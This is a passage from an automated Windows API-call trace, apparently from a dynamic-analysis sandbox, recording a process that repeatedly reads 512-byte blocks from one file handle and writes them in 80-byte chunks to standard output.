lpOverlapped=0x0) returned 1 [0128.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.171] GetFileType (hFile=0x50) returned 0x1 [0128.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.171] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.171] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.171] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.171] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.171] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.171] GetFileType (hFile=0x50) returned 0x1 [0128.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.171] GetFileType (hFile=0x50) returned 0x1 [0128.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.171] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.171] GetFileType (hFile=0x50) returned 0x1 [0128.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.172] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.172] GetFileType (hFile=0x50) returned 0x1 [0128.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.172] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.172] GetFileType (hFile=0x50) returned 0x1 [0128.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.172] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.172] GetFileType (hFile=0x50) returned 0x1 [0128.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.172] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.172] GetFileType (hFile=0x50) returned 0x1 [0128.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.172] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.172] GetFileType (hFile=0x50) returned 0x1 [0128.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.172] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.172] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.172] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.173] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.173] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.173] GetFileType (hFile=0x50) returned 0x1 [0128.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.173] GetFileType (hFile=0x50) returned 0x1 [0128.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.173] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.173] GetFileType (hFile=0x50) returned 0x1 [0128.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.173] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.173] GetFileType (hFile=0x50) returned 0x1 [0128.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.173] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.173] GetFileType (hFile=0x50) returned 0x1 [0128.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.173] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.173] GetFileType (hFile=0x50) returned 0x1 [0128.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.173] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.174] GetFileType (hFile=0x50) returned 0x1 [0128.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.174] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.174] GetFileType (hFile=0x50) returned 0x1 [0128.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.174] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.174] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.174] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.174] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.174] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.174] GetFileType (hFile=0x50) returned 0x1 [0128.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.174] GetFileType (hFile=0x50) returned 0x1 [0128.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.174] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.174] GetFileType (hFile=0x50) returned 0x1 [0128.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.174] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.174] GetFileType (hFile=0x50) returned 0x1 [0128.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.174] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.175] GetFileType (hFile=0x50) returned 0x1 [0128.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.175] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.175] GetFileType (hFile=0x50) returned 0x1 [0128.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.175] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.175] GetFileType (hFile=0x50) returned 0x1 [0128.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.175] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.175] GetFileType (hFile=0x50) returned 0x1 [0128.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.175] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.175] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.175] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.175] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.175] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.175] GetFileType (hFile=0x50) returned 0x1 [0128.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.176] GetFileType (hFile=0x50) returned 0x1 [0128.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.176] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.176] GetFileType (hFile=0x50) returned 0x1 [0128.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.176] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.176] GetFileType (hFile=0x50) returned 0x1 [0128.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.176] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.176] GetFileType (hFile=0x50) returned 0x1 [0128.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.176] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.176] GetFileType (hFile=0x50) returned 0x1 [0128.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.176] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.176] GetFileType (hFile=0x50) returned 0x1 [0128.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.176] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.176] GetFileType (hFile=0x50) returned 0x1 [0128.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.176] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.177] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.177] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.177] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.177] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.177] GetFileType (hFile=0x50) returned 0x1 [0128.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.177] GetFileType (hFile=0x50) returned 0x1 [0128.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.177] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.177] GetFileType (hFile=0x50) returned 0x1 [0128.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.177] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.177] GetFileType (hFile=0x50) returned 0x1 [0128.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.177] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.178] GetFileType (hFile=0x50) returned 0x1 [0128.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.178] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.178] GetFileType (hFile=0x50) returned 0x1 [0128.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.178] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.178] GetFileType (hFile=0x50) returned 0x1 [0128.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.178] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.178] GetFileType (hFile=0x50) returned 0x1 [0128.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.178] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.178] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.178] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.178] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.178] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.178] GetFileType (hFile=0x50) returned 0x1 [0128.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.178] GetFileType (hFile=0x50) returned 0x1 [0128.206] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.206] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.207] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.207] GetFileType (hFile=0x50) returned 0x1 [0128.207] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.207] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.207] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.207] GetFileType (hFile=0x50) returned 0x1 [0128.207] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.207] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.207] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.207] GetFileType (hFile=0x50) returned 0x1 [0128.207] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.207] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.207] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.207] GetFileType (hFile=0x50) returned 0x1 [0128.207] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.207] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.207] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.207] GetFileType (hFile=0x50) returned 0x1 [0128.207] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.207] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.207] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.207] GetFileType (hFile=0x50) returned 0x1 [0128.207] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.208] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.208] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.208] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.208] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.208] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.208] GetFileType (hFile=0x50) returned 0x1 [0128.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.208] GetFileType (hFile=0x50) returned 0x1 [0128.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.208] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.208] GetFileType (hFile=0x50) returned 0x1 [0128.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.208] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.208] GetFileType (hFile=0x50) returned 0x1 [0128.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.208] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.208] GetFileType (hFile=0x50) returned 0x1 [0128.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.208] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.209] GetFileType (hFile=0x50) returned 0x1 [0128.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.209] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.209] GetFileType (hFile=0x50) returned 0x1 [0128.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.209] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.209] GetFileType (hFile=0x50) returned 0x1 [0128.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.209] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.209] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.209] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.209] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.209] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.209] GetFileType (hFile=0x50) returned 0x1 [0128.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.209] GetFileType (hFile=0x50) returned 0x1 [0128.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.209] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.209] _get_osfhandle (_FileHandle=1) 